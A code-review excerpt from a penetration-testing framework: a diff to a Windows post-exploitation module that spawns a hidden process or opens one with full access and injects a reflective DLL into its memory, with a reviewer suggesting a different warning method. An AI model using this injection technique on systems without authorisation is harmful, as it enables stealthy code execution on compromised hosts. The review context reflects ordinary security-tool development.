modules/post/windows/manage/reflective_dll_inject.rb

```diff
@@ -6,45 +6,187 @@
-        ]
-    ))
-
+      [
+        [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ]
+      ]))
     register_options(
       [
-        OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']),
-        OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']),
-      ])
+        OptPath.new('PATH', [true, 'Reflective DLL to inject into memory of a process.']),
+        OptInt.new('PID', [false, 'Pid  to inject', 0]),
+        OptString.new('PROCESS', [false, 'Process to spawn','notepad.exe']),
+        OptString.new('ARGUMENTS', [false, 'Command line arguments']),
+        OptInt.new('WAIT', [false, 'Time in seconds to wait.', 0])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('KILL',   [ true, 'Kill the injected process at the end of the task. ', false ])
+      ]
+    )
   end
 
-  # Run Method for when run command is issued
   def run
-    # syinfo is only on meterpreter sessions
-    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+    dll_path = gen_dll_path
+    if File.file?(dll_path)
+      run_dll(dll_path)
+    else
+      print_bad("Dll not found #{dll_path}")
+    end
+  end
+
+  def gen_dll_path
+    dll_path = ::File.expand_path(datastore['PATH'])
+    dll_path
+  end
+
+  def sanitize_process_name(process_name)
+    if process_name.split(//).last(4).join.eql? '.exe'
+      process_name
+    else
+      process_name + '.exe'
+    end
+  end
+
+  def pid_exists(pid)
+    mypid = client.sys.process.getpid.to_i
+
+    if pid == mypid
+      print_bad("Invalid PID")
+      return false
+    end
+
+    host_processes = client.sys.process.get_processes
+    if host_processes.length < 1
+      print_bad("No running processes found on the target host.")
+      return false
+    end
+
+    theprocess = host_processes.find {|x| x["pid"] == pid}
+
+    if ( theprocess.nil? )
+      return false
+    else
+      return true
+    end
+
+  end
+
+  def launch_process
+    process_name = sanitize_process_name(datastore['PROCESS'])
+    print_status("Launching #{process_name} ...")
+    channelized = datastore['WAIT'] != 0
+
+    process = client.sys.process.execute(process_name, nil,
+      'Channelized' => channelized,'Hidden' => true)
+
+    hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} created.")
+    [process, hprocess]
+  end
 
+  def inject_dll(process,dll_path)
+    library_path = ::File.expand_path(dll_path)
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    [exploit_mem, offset]
+  end
+
+  def open_process
     pid = datastore['PID'].to_i
-    host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    if not pid_exists(pid)
+      print_bad("Pid not found")
+      [nil, nil]
+    else
+      print_status('Warning: output unavailable')
```

Comment:
We actually have a `print_warning` method available that would be well suited for this.